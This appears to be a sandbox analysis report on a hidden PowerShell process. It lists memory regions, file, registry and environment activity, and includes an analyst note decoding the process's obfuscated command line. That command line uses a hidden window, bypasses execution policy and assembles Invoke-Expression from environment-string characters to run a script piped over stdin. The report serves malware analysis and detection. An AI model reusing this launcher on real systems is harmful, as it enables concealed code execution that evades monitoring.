Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2018-11-06 10:24:16 (UTC) True 1
Fn
Get Time type = Ticks, time = 141758 True 1
Fn
Environment (9)
Operation Additional Information Success Count Logfile
Get Environment String - True 3
Fn
Data
Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client True 1
Fn
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Fn
Get Environment String name = PROMPT, result_out = $P$G True 1
Fn
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Get Environment String name = KEYS False 1
Fn
Set Environment String name = =C:, value = C:\Users\aETAdzjz\Desktop True 1
Fn
Process #15: powershell.exe
634 182
Information Value
ID #15
File Name c:\windows\system32\windowspowershell\v1.0\powershell.exe
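Command Line POwERsHElL -noNiNTEraCTI -NolO -wiN hIdden -execuTIONpOLIc byPASS -nOPrOFIle -COmMANd &( $eNV:ComsPec[4,24,25]-JoIn'')($inpuT )
[Analyst note: the abbreviated, mixed-case switches resolve to -NonInteractive, -NoLogo, -WindowStyle Hidden, -ExecutionPolicy Bypass and -NoProfile. With COMSPEC = C:\Windows\system32\cmd.exe (as logged for cmd.exe earlier in this report), characters 4, 24 and 25 of $env:ComSpec are "i", "e" and "x", so the command invokes iex (Invoke-Expression) on $input. The script body therefore arrives over standard input (see the 79-byte STD_INPUT_HANDLE read under Host Behavior) and does not appear in this command line; process-creation logging alone will not capture it.]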
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:01:44, Reason: Child Process
Unmonitor End Time: 00:02:06, Reason: Self Terminated
Monitor Duration 00:00:22
OS Process Information
Information Value
PID 0xb5c
Parent PID 0xb4c (c:\windows\system32\cmd.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x B60
0x B70
0x B74
0x B7C
0x B94
0x B98
0x 780
0x 878
0x 14C
0x 410
0x 214
0x 28C
0x 508
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x00045fff Private Memory rw True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000030000 0x00030000 0x00036fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000040000 0x00040000 0x00041fff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory r True False False -
locale.nls 0x00070000 0x000d6fff Memory Mapped File r False False False -
powershell.exe.mui 0x000e0000 0x000e2fff Memory Mapped File rw False False False -
private_0x00000000000f0000 0x000f0000 0x000f0fff Private Memory rw True False False -
private_0x0000000000100000 0x00100000 0x00100fff Private Memory rw True False False -
pagefile_0x0000000000110000 0x00110000 0x00110fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000120000 0x00120000 0x00120fff Pagefile Backed Memory r True False False -
private_0x0000000000130000 0x00130000 0x001affff Private Memory rw True False False -
pagefile_0x00000000001b0000 0x001b0000 0x001b1fff Pagefile Backed Memory r True False False -
pagefile_0x00000000001c0000 0x001c0000 0x001c0fff Pagefile Backed Memory rw True False False -
pagefile_0x00000000001d0000 0x001d0000 0x001d1fff Pagefile Backed Memory r True False False -
cversions.1.db 0x001e0000 0x001e3fff Memory Mapped File r True False False -
cversions.2.db 0x001e0000 0x001e3fff Memory Mapped File r True False False -
pagefile_0x00000000001f0000 0x001f0000 0x001f0fff Pagefile Backed Memory rw True False False -
private_0x0000000000200000 0x00200000 0x0020ffff Private Memory rw True False False -
cversions.2.db 0x00210000 0x00213fff Memory Mapped File r True False False -
private_0x0000000000220000 0x00220000 0x0022ffff Private Memory rw True False False -
private_0x0000000000230000 0x00230000 0x002affff Private Memory rw True False False -
private_0x00000000002b0000 0x002b0000 0x003affff Private Memory rw True False False -
private_0x00000000003b0000 0x003b0000 0x004affff Private Memory rw True False False -
pagefile_0x00000000004b0000 0x004b0000 0x00637fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000640000 0x00640000 0x007c0fff Pagefile Backed Memory r True False False -
pagefile_0x00000000007d0000 0x007d0000 0x01bcffff Pagefile Backed Memory r True False False -
private_0x0000000001bd0000 0x01bd0000 0x01ccffff Private Memory rw True False False -
private_0x0000000001cd0000 0x01cd0000 0x01d4ffff Private Memory rw True False False -
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db 0x01d50000 0x01d6ffff Memory Mapped File r True False False -
private_0x0000000001d70000 0x01d70000 0x01deffff Private Memory rwx True False False -
pagefile_0x0000000001df0000 0x01df0000 0x01ecefff Pagefile Backed Memory r True False False -
sortdefault.nls 0x01ed0000 0x0219efff Memory Mapped File r False False False -
pagefile_0x00000000021a0000 0x021a0000 0x02592fff Pagefile Backed Memory r True False False -
{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db 0x025a0000 0x025cffff Memory Mapped File r True False False -
{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db 0x025d0000 0x02635fff Memory Mapped File r True False False -
pagefile_0x0000000002640000 0x02640000 0x02640fff Pagefile Backed Memory r True False False -
pagefile_0x0000000002650000 0x02650000 0x02652fff Pagefile Backed Memory rw True False False -
private_0x0000000002660000 0x02660000 0x026dffff Private Memory rw True False False -
pagefile_0x00000000026e0000 0x026e0000 0x026e0fff Pagefile Backed Memory rw True False False -
private_0x00000000026f0000 0x026f0000 0x026fffff Private Memory rw True False False -
private_0x0000000002700000 0x02700000 0x0271ffff Private Memory - True False False -
l_intl.nls 0x02720000 0x02722fff Memory Mapped File r False False False -
private_0x0000000002730000 0x02730000 0x027affff Private Memory rwx True False False -
private_0x00000000027b0000 0x027b0000 0x027b0fff Private Memory rw True False False -
private_0x00000000027c0000 0x027c0000 0x0283ffff Private Memory rw True False False -
private_0x0000000002840000 0x02840000 0x0293ffff Private Memory rw True False False -
kernelbase.dll.mui 0x02940000 0x029fffff Memory Mapped File rw False False False -
sorttbls.nlp 0x02a00000 0x02a04fff Memory Mapped File r False False False -
microsoft.wsman.runtime.dll 0x02a10000 0x02a17fff Memory Mapped File rwx False False False -
pagefile_0x0000000002a20000 0x02a20000 0x02a20fff Pagefile Backed Memory r True False False -
private_0x0000000002a30000 0x02a30000 0x02a3ffff Private Memory rw True False False -
private_0x0000000002a40000 0x02a40000 0x02b3ffff Private Memory rw True False False -
private_0x0000000002b40000 0x02b40000 0x02c40fff Private Memory rw True False False -
sortkey.nlp 0x02c50000 0x02c90fff Memory Mapped File r False False False -
private_0x0000000002ca0000 0x02ca0000 0x02d1ffff Private Memory rw True False False -
private_0x0000000002d20000 0x02d20000 0x1ad1ffff Private Memory rw True False False -
private_0x000000001ad20000 0x1ad20000 0x1b3effff Private Memory rw True False False -
private_0x000000001b3f0000 0x1b3f0000 0x1b46ffff Private Memory rw True False False -
system.management.automation.dll 0x1b470000 0x1b751fff Memory Mapped File rwx False False False -
pagefile_0x000000001b760000 0x1b760000 0x1b760fff Pagefile Backed Memory r True False False -
mscorrc.dll 0x1b760000 0x1b7b3fff Memory Mapped File r True False False -
system.transactions.dll 0x1e230000 0x1e278fff Memory Mapped File rwx False False False -
msvcr80.dll 0x756a0000 0x75768fff Memory Mapped File rwx False False False -
user32.dll 0x77a20000 0x77b19fff Memory Mapped File rwx False False False -
kernel32.dll 0x77b20000 0x77c3efff Memory Mapped File rwx False False False -
ntdll.dll 0x77c40000 0x77de8fff Memory Mapped File rwx False False False -
psapi.dll 0x77e00000 0x77e06fff Memory Mapped File rwx False False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory r True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory r True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory r True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory r True False False -
powershell.exe 0x13fdf0000 0x13fe66fff Memory Mapped File rwx False False False -
culture.dll 0x642ff4a0000 0x642ff4a9fff Memory Mapped File rwx True False False -
system.directoryservices.ni.dll 0x7fee1030000 0x7fee11c4fff Memory Mapped File rwx True False False -
system.management.ni.dll 0x7fee11d0000 0x7fee133bfff Memory Mapped File rwx True False False -
system.xml.ni.dll 0x7fee1340000 0x7fee19e4fff Memory Mapped File rwx True False False -
microsoft.powershell.security.ni.dll 0x7fee1bf0000 0x7fee1c2dfff Memory Mapped File rwx True False False -
microsoft.powershell.commands.management.ni.dll 0x7fee1c30000 0x7fee1d47fff Memory Mapped File rwx True False False -
microsoft.powershell.commands.utility.ni.dll 0x7fee1d50000 0x7fee1f65fff Memory Mapped File rwx True False False -
system.transactions.ni.dll 0x7fee1f70000 0x7fee2054fff Memory Mapped File rwx True False False -
microsoft.wsman.management.ni.dll 0x7fee20f0000 0x7fee2199fff Memory Mapped File rwx True False False -
system.configuration.install.ni.dll 0x7fee21a0000 0x7fee21d1fff Memory Mapped File rwx True False False -
microsoft.powershell.commands.diagnostics.ni.dll 0x7fee21e0000 0x7fee2248fff Memory Mapped File rwx True False False -
system.core.ni.dll 0x7fee2250000 0x7fee257dfff Memory Mapped File rwx True False False -
system.management.automation.ni.dll 0x7fee2580000 0x7fee30dcfff Memory Mapped File rwx True False False -
microsoft.powershell.consolehost.ni.dll 0x7fee30e0000 0x7fee3191fff Memory Mapped File rwx True False False -
system.ni.dll 0x7fee31a0000 0x7fee3bc2fff Memory Mapped File rwx True False False -
mscorlib.ni.dll 0x7fee3bd0000 0x7fee4aabfff Memory Mapped File rwx True False False -
mscorwks.dll 0x7fee4ab0000 0x7fee544cfff Memory Mapped File rwx True False False -
shfolder.dll 0x7fee6a30000 0x7fee6a36fff Memory Mapped File rwx False False False -
mscoreei.dll 0x7fee9c80000 0x7fee9d18fff Memory Mapped File rwx True False False -
mscoree.dll 0x7fee9d20000 0x7fee9d8efff Memory Mapped File rwx True False False -
linkinfo.dll 0x7fef8e40000 0x7fef8e4bfff Memory Mapped File rwx False False False -
shdocvw.dll 0x7fef8e50000 0x7fef8e83fff Memory Mapped File rwx False False False -
ntshrui.dll 0x7fef9b40000 0x7fef9bbffff Memory Mapped File rwx False False False -
cscapi.dll 0x7fef9bc0000 0x7fef9bcefff Memory Mapped File rwx False False False -
apphelp.dll 0x7fefb340000 0x7fefb396fff Memory Mapped File rwx False False False -
slc.dll 0x7fefb730000 0x7fefb73afff Memory Mapped File rwx False False False -
atl.dll 0x7fefb760000 0x7fefb778fff Memory Mapped File rwx False False False -
ntmarta.dll 0x7fefbb00000 0x7fefbb2cfff Memory Mapped File rwx False False False -
uxtheme.dll 0x7fefc4b0000 0x7fefc505fff Memory Mapped File rwx False False False -
propsys.dll 0x7fefc510000 0x7fefc63bfff Memory Mapped File rwx False False False -
comctl32.dll 0x7fefc690000 0x7fefc883fff Memory Mapped File rwx False False False -
version.dll 0x7fefcd50000 0x7fefcd5bfff Memory Mapped File rwx False False False -
userenv.dll 0x7fefcf30000 0x7fefcf4dfff Memory Mapped File rwx False False False -
rsaenh.dll 0x7fefd180000 0x7fefd1c6fff Memory Mapped File rwx False False False -
cryptsp.dll 0x7fefd480000 0x7fefd496fff Memory Mapped File rwx False False False -
srvcli.dll 0x7fefd980000 0x7fefd9a2fff Memory Mapped File rwx False False False -
cryptbase.dll 0x7fefda80000 0x7fefda8efff Memory Mapped File rwx False False False -
profapi.dll 0x7fefdb90000 0x7fefdb9efff Memory Mapped File rwx False False False -
cfgmgr32.dll 0x7fefdce0000 0x7fefdd15fff Memory Mapped File rwx False False False -
kernelbase.dll 0x7fefdd60000 0x7fefddcafff Memory Mapped File rwx False False False -
devobj.dll 0x7fefddd0000 0x7fefdde9fff Memory Mapped File rwx False False False -
gdi32.dll 0x7fefdf60000 0x7fefdfc6fff Memory Mapped File rwx False False False -
shell32.dll 0x7fefdfd0000 0x7fefed57fff Memory Mapped File rwx False False False -
imm32.dll 0x7fefed60000 0x7fefed8dfff Memory Mapped File rwx False False False -
advapi32.dll 0x7feff0e0000 0x7feff1bafff Memory Mapped File rwx False False False -
sechost.dll 0x7feff1c0000 0x7feff1defff Memory Mapped File rwx False False False -
msctf.dll 0x7feff1e0000 0x7feff2e8fff Memory Mapped File rwx False False False -
setupapi.dll 0x7feff2f0000 0x7feff4c6fff Memory Mapped File rwx False False False -
usp10.dll 0x7feff4d0000 0x7feff598fff Memory Mapped File rwx False False False -
msvcrt.dll 0x7feff5a0000 0x7feff63efff Memory Mapped File rwx False False False -
shlwapi.dll 0x7feff640000 0x7feff6b0fff Memory Mapped File rwx False False False -
lpk.dll 0x7feff860000 0x7feff86dfff Memory Mapped File rwx False False False -
clbcatq.dll 0x7feff9a0000 0x7feffa38fff Memory Mapped File rwx False False False -
ole32.dll 0x7feffa40000 0x7feffc42fff Memory Mapped File rwx False False False -
rpcrt4.dll 0x7feffc50000 0x7feffd7cfff Memory Mapped File rwx False False False -
oleaut32.dll 0x7feffd80000 0x7feffe56fff Memory Mapped File rwx False False False -
wldap32.dll 0x7feffe60000 0x7feffeb1fff Memory Mapped File rwx False False False -
apisetschema.dll 0x7fefff60000 0x7fefff60fff Memory Mapped File rwx False False False -
private_0x000007ff00020000 0x7ff00020000 0x7ff0002ffff Private Memory - True False False -
private_0x000007ff00030000 0x7ff00030000 0x7ff0003ffff Private Memory - True False False -
private_0x000007ff00040000 0x7ff00040000 0x7ff000dffff Private Memory - True False False -
private_0x000007ff000e0000 0x7ff000e0000 0x7ff000effff Private Memory - True False False -
private_0x000007ff000f0000 0x7ff000f0000 0x7ff0015ffff Private Memory - True False False -
private_0x000007ff00160000 0x7ff00160000 0x7ff0016ffff Private Memory - True False False -
private_0x000007ff00170000 0x7ff00170000 0x7ff0017ffff Private Memory - True False False -
private_0x000007fffff10000 0x7fffff10000 0x7fffff1ffff Private Memory rwx True False False -
private_0x000007fffff20000 0x7fffff20000 0x7fffffaffff Private Memory rwx True False False -
pagefile_0x000007fffffb0000 0x7fffffb0000 0x7fffffd2fff Pagefile Backed Memory r True False False -
private_0x000007fffffd3000 0x7fffffd3000 0x7fffffd4fff Private Memory rw True False False -
private_0x000007fffffd5000 0x7fffffd5000 0x7fffffd6fff Private Memory rw True False False -
private_0x000007fffffd7000 0x7fffffd7000 0x7fffffd8fff Private Memory rw True False False -
private_0x000007fffffd9000 0x7fffffd9000 0x7fffffdafff Private Memory rw True False False -
private_0x000007fffffdb000 0x7fffffdb000 0x7fffffdcfff Private Memory rw True False False -
private_0x000007fffffdd000 0x7fffffdd000 0x7fffffdefff Private Memory rw True False False -
private_0x000007fffffdf000 0x7fffffdf000 0x7fffffdffff Private Memory rw True False False -
For performance reasons, the remaining 97 entries are omitted.
The remaining entries can be found in flog.txt.
Host Behavior
File (142)
Operation Filename Additional Information Success Count Logfile
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 2
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Get Info C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\powershell.config type = file_attributes False 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0 type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml type = file_attributes True 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml type = file_attributes True 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml type = file_attributes True 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml type = file_attributes True 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml type = file_attributes True 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml type = file_attributes True 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml type = file_type True 2
Fn
Get Info C:\Users\aETAdzjz type = file_attributes True 1
Fn
Get Info C:\ type = file_attributes True 4
Fn
Get Info C:\Users\aETAdzjz\Desktop type = file_attributes True 3
Fn
Get Info STD_INPUT_HANDLE type = file_type True 1
Fn
Get Info C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config type = file_attributes True 2
Fn
Get Info C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config type = file_type True 2
Fn
Get Info C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config type = size, size_out = 0 True 1
Fn
Open STD_INPUT_HANDLE - True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 4096 True 3
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 3315 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 781, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml size = 4096, size_out = 4096 True 41
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml size = 4096, size_out = 436 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml size = 4096, size_out = 0 True 1
Fn
Read - size = 4096, size_out = 4096 True 5
Fn
Data
Read - size = 4096, size_out = 2530 True 1
Fn
Data
Read - size = 542, size_out = 0 True 1
Fn
Read - size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml size = 4096, size_out = 4096 True 21
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml size = 4096, size_out = 4018 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml size = 78, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml size = 4096, size_out = 0 True 2
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml size = 4096, size_out = 3022 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml size = 50, size_out = 0 True 1
Fn
Read STD_INPUT_HANDLE size = 1024, size_out = 79 True 1
Fn
Data
Read STD_INPUT_HANDLE size = 1024, size_out = 0 False 1
Fn
Read C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config size = 4096, size_out = 4096 True 5
Fn
Data
Read C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config size = 4096, size_out = 1459 True 1
Fn
Data
Read C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config size = 4096, size_out = 0 True 1
Fn
Registry (211)
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment - True 1
Fn
Open Key HKEY_CURRENT_USER\Environment - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 9
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance - True 1
Fn
Open Key HKEY_CURRENT_USER - True 1
Fn
Open Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
